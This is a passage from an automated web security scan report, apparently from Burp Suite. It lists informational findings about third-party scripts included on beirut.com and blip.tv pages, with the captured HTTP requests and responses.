HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:12:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.726. http://www.beirut.com/twitter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/twitter

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /twitter HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:35:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.727. http://www.beirut.com/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

Request

GET /xd_receiver.htm HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=98034c63917cb0c0c02f1b9429eaa593&extern=0&channel=http%3A%2F%2Fwww.beirut.com%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:13:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Sep 2010 13:16:23 GMT
ETag: "cf006f-16e-48f97164077c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/x
...[SNIP]...
<body><script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

21.728. http://www.blip.tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/DistributionLogoFlipper.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/HomeThumbInfo.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/HomeTwitter.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 27267
Date: Tue, 25 Jan 2011 13:12:57 GMT
X-Varnish: 1794566613
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/DistributionLogoFlipper.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/HomeThumbInfo.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/HomeTwitter.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.729. http://www.blip.tv/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/about/

Issue detail

The response dynamically includes the following scripts from other domains:

http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16917
Date: Tue, 25 Jan 2011 13:12:59 GMT
X-Varnish: 829691482
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...

<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...


<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.730. http://www.blip.tv/blogs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/blogs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /blogs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10640
Date: Tue, 25 Jan 2011 13:13:02 GMT
X-Varnish: 496204649
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.731. http://www.blip.tv/dtd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/dtd

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /dtd HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 10622
Date: Tue, 25 Jan 2011 13:13:13 GMT
X-Varnish: 1652152037
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.732. http://www.blip.tv/dtd/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/dtd/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /dtd/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 10622
Date: Tue, 25 Jan 2011 13:13:04 GMT
X-Varnish: 809220060
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.733. http://www.blip.tv/file previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/file

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /file HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10777
Date: Tue, 25 Jan 2011 13:13:14 GMT
X-Varnish: 829692866
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.734. http://www.blip.tv/file/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/file/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /file/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 10777
Date: Tue, 25 Jan 2011 13:13:14 GMT
X-Varnish: 1652152169
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.735. http://www.blip.tv/html5/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/html5/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff
http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /html5/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 12127
Date: Tue, 25 Jan 2011 13:13:24 GMT
X-Varnish: 496206811
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...
</script>

<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-latest.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/jquery-ui.min.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariCaptcha.js?v=thingsrealpeoplesay"></script>
